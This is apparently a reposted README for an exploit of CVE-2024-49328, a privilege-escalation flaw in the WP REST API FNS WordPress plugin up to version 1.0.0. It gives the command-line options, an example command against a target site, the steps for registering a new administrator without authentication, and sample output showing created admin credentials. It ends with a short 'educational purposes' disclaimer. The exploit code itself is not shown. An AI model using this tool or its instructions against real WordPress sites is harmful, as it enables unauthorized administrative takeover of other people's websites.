Share
## https://sploitus.com/exploit?id=0FAFB36E-FCEF-5A02-A323-06538CBEFCFE
# CVE-2024-49328-exploit

# ๐ŸŒŸ Description:
This script exploits a privilege escalation vulnerability in the WP REST API FNS Plugin for WordPress. The vulnerability affects all versions up to and including `1.0.0`, allowing unauthenticated attackers to gain administrator privileges.


## โš™๏ธ Usage
```bash


options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -e NEWEMAIL, --Newemail NEWEMAIL New email to register
  -p PASSWORD, --password PASSWORD Password for the new user
                        
```
  Example Command:

```
python CVE-2024-49328.py -u http://targetsite.com -e admin@example.com -p password123

```
 ### ๐Ÿ” Details of Exploitation


| **Step** | **Description**                                               | **Icon**           |
|----------|---------------------------------------------------------------|--------------------|
| Step 1   | Verify the version of the plugin.            | ๐Ÿ“                 |
| Step 2   | Check if the version is exploitable (`1.0.0`,  or lower).| โœ…                 |
| Step 3   | Exploit the vulnerability and register a new admin user.      | ๐Ÿ”’             |
| Step 4   | Print the result with user credentials for verification.      | ๐ŸŽ‰                 |

## โžก๏ธ Example Output
```

Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: Nxploit@admin.sa
Password: nxploit
```


### Install the required packages

```
pip install requests
```



## โš ๏ธ Disclaimer
๐Ÿšจ Warning:

This script is for educational purposes only. Unauthorized use of this script against systems without explicit permission is illegal and unethical.